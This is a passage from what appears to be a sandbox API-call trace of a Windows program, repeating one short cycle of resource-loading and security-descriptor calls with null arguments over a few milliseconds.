(hResData=0x0) returned 0 [0069.999] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.999] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.999] LockResource (hResData=0x0) returned 0x0 [0069.999] FreeResource (hResData=0x0) returned 0 [0069.999] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.999] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.999] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.999] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.999] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.999] LockResource (hResData=0x0) returned 0x0 [0069.999] FreeResource (hResData=0x0) returned 0 [0069.999] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.999] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.999] LockResource (hResData=0x0) returned 0x0 [0069.999] FreeResource (hResData=0x0) returned 0 [0069.999] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.999] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.999] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.999] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.999] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.999] LockResource (hResData=0x0) returned 0x0 [0069.999] FreeResource (hResData=0x0) returned 0 [0069.999] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.999] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.999] LockResource (hResData=0x0) returned 0x0 [0069.999] FreeResource (hResData=0x0) returned 0 [0069.999] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.999] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.999] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.999] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.999] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.999] LockResource (hResData=0x0) returned 0x0 [0069.999] FreeResource (hResData=0x0) returned 0 [0069.999] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.999] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.999] LockResource (hResData=0x0) returned 0x0 [0069.999] FreeResource (hResData=0x0) returned 0 [0069.999] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0069.999] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0069.999] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0069.999] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0069.999] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.999] LockResource (hResData=0x0) returned 0x0 [0069.999] FreeResource (hResData=0x0) returned 0 [0069.999] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0069.999] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0069.999] LockResource (hResData=0x0) returned 0x0 [0070.000] FreeResource (hResData=0x0) returned 0 [0070.000] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.000] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.000] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.000] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.000] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.000] LockResource (hResData=0x0) returned 0x0 [0070.000] FreeResource (hResData=0x0) returned 0 [0070.000] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.000] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.000] LockResource (hResData=0x0) returned 0x0 [0070.000] FreeResource (hResData=0x0) returned 0 [0070.000] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.000] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.000] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.000] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.000] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.000] LockResource (hResData=0x0) returned 0x0 [0070.000] FreeResource (hResData=0x0) returned 0 [0070.000] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.000] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.000] LockResource (hResData=0x0) returned 0x0 [0070.000] FreeResource (hResData=0x0) returned 0 [0070.000] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.000] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.000] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.000] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.000] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.000] LockResource (hResData=0x0) returned 0x0 [0070.000] FreeResource (hResData=0x0) returned 0 [0070.000] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.000] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.000] LockResource (hResData=0x0) returned 0x0 [0070.000] FreeResource (hResData=0x0) returned 0 [0070.000] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.000] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.000] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.000] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.000] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.000] LockResource (hResData=0x0) returned 0x0 [0070.000] FreeResource (hResData=0x0) returned 0 [0070.000] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.000] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.000] LockResource (hResData=0x0) returned 0x0 [0070.000] FreeResource (hResData=0x0) returned 0 [0070.000] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.000] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.000] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.000] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.000] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.001] LockResource (hResData=0x0) returned 0x0 [0070.001] FreeResource (hResData=0x0) returned 0 [0070.001] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.001] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.001] LockResource (hResData=0x0) returned 0x0 [0070.001] FreeResource (hResData=0x0) returned 0 [0070.001] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.001] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.001] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.001] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.001] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.001] LockResource (hResData=0x0) returned 0x0 [0070.001] FreeResource (hResData=0x0) returned 0 [0070.001] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.001] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.001] LockResource (hResData=0x0) returned 0x0 [0070.001] FreeResource (hResData=0x0) returned 0 [0070.001] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.001] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.001] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.001] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.001] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.001] LockResource (hResData=0x0) returned 0x0 [0070.001] FreeResource (hResData=0x0) returned 0 [0070.001] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.001] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.001] LockResource (hResData=0x0) returned 0x0 [0070.001] FreeResource (hResData=0x0) returned 0 [0070.001] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.001] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.001] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.001] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.001] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.001] LockResource (hResData=0x0) returned 0x0 [0070.001] FreeResource (hResData=0x0) returned 0 [0070.001] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.001] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.001] LockResource (hResData=0x0) returned 0x0 [0070.001] FreeResource (hResData=0x0) returned 0 [0070.001] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.001] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.001] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.001] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.001] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.001] LockResource (hResData=0x0) returned 0x0 [0070.001] FreeResource (hResData=0x0) returned 0 [0070.001] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.002] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.002] LockResource (hResData=0x0) returned 0x0 [0070.002] FreeResource (hResData=0x0) returned 0 [0070.002] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.002] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.002] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.002] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.002] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.002] LockResource (hResData=0x0) returned 0x0 [0070.002] FreeResource (hResData=0x0) returned 0 [0070.002] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.002] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.002] LockResource (hResData=0x0) returned 0x0 [0070.002] FreeResource (hResData=0x0) returned 0 [0070.002] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.002] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.002] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.002] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.002] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.002] LockResource (hResData=0x0) returned 0x0 [0070.002] FreeResource (hResData=0x0) returned 0 [0070.002] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.002] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.002] LockResource (hResData=0x0) returned 0x0 [0070.002] FreeResource (hResData=0x0) returned 0 [0070.002] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.002] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.002] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.002] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.002] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.002] LockResource (hResData=0x0) returned 0x0 [0070.002] FreeResource (hResData=0x0) returned 0 [0070.002] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.002] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.002] LockResource (hResData=0x0) returned 0x0 [0070.002] FreeResource (hResData=0x0) returned 0 [0070.002] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.002] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.002] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.002] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.002] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.002] LockResource (hResData=0x0) returned 0x0 [0070.002] FreeResource (hResData=0x0) returned 0 [0070.002] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.002] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.002] LockResource (hResData=0x0) returned 0x0 [0070.002] FreeResource (hResData=0x0) returned 0 [0070.002] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.002] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.003] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.003] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.003] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.003] LockResource (hResData=0x0) returned 0x0 [0070.003] FreeResource (hResData=0x0) returned 0 [0070.003] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.003] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.003] LockResource (hResData=0x0) returned 0x0 [0070.003] FreeResource (hResData=0x0) returned 0 [0070.003] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.003] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.003] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.003] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.003] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.003] LockResource (hResData=0x0) returned 0x0 [0070.003] FreeResource (hResData=0x0) returned 0 [0070.003] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.003] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.003] LockResource (hResData=0x0) returned 0x0 [0070.003] FreeResource (hResData=0x0) returned 0 [0070.003] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.003] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.003] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.003] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.003] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.003] LockResource (hResData=0x0) returned 0x0 [0070.003] FreeResource (hResData=0x0) returned 0 [0070.003] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.003] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.003] LockResource (hResData=0x0) returned 0x0 [0070.003] FreeResource (hResData=0x0) returned 0 [0070.003] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.003] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.003] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.003] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.003] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.003] LockResource (hResData=0x0) returned 0x0 [0070.003] FreeResource (hResData=0x0) returned 0 [0070.003] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.003] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.003] LockResource (hResData=0x0) returned 0x0 [0070.003] FreeResource (hResData=0x0) returned 0 [0070.003] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.003] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.003] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.003] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.003] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.003] LockResource (hResData=0x0) returned 0x0 [0070.004] FreeResource (hResData=0x0) returned 0 [0070.004] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.004] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.004] LockResource (hResData=0x0) returned 0x0 [0070.004] FreeResource (hResData=0x0) returned 0 [0070.004] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.004] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.004] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.004] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.004] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.004] LockResource (hResData=0x0) returned 0x0 [0070.004] FreeResource (hResData=0x0) returned 0 [0070.004] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.004] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.004] LockResource (hResData=0x0) returned 0x0 [0070.004] FreeResource (hResData=0x0) returned 0 [0070.004] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.004] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.004] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.004] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.004] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.004] LockResource (hResData=0x0) returned 0x0 [0070.004] FreeResource (hResData=0x0) returned 0 [0070.004] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.004] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.004] LockResource (hResData=0x0) returned 0x0 [0070.004] FreeResource (hResData=0x0) returned 0 [0070.004] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.004] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.004] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.004] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.004] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.004] LockResource (hResData=0x0) returned 0x0 [0070.004] FreeResource (hResData=0x0) returned 0 [0070.004] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.004] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.004] LockResource (hResData=0x0) returned 0x0 [0070.004] FreeResource (hResData=0x0) returned 0 [0070.004] GetPrivateObjectSecurity (in: ObjectDescriptor=0x20bddd8, SecurityInformation=0x0, ResultantDescriptor=0x20bddd8, DescriptorLength=0x0, ReturnLength=0x20bddd4 | out: ResultantDescriptor=0x20bddd8, ReturnLength=0x20bddd4) returned 0 [0070.004] GetSecurityDescriptorControl (in: pSecurityDescriptor=0x20bddd8, pControl=0x20bddd0, lpdwRevision=0x20bde4c | out: pControl=0x20bddd0, lpdwRevision=0x20bde4c) returned 0 [0070.004] IsNLSDefinedString (Function=0x0, dwFlags=0x0, lpVersionInformation=0x0, lpString=0x0, cchStr=0) returned 0 [0070.004] FindResourceA (hModule=0x400000, lpName="", lpType=0xe) returned 0x0 [0070.004] LoadResource (hModule=0x400000, hResInfo=0x0) returned 0x0 [0070.004] LockResource (hResData=0x0) returned 0x0 [0070.004] FreeResource (hResData=0x0) returned 0 [0070.004] FindResourceA (hModule=0x400000, lpName=0x0, lpType=0x3) returned 0x0 [0070.004] LoadResource 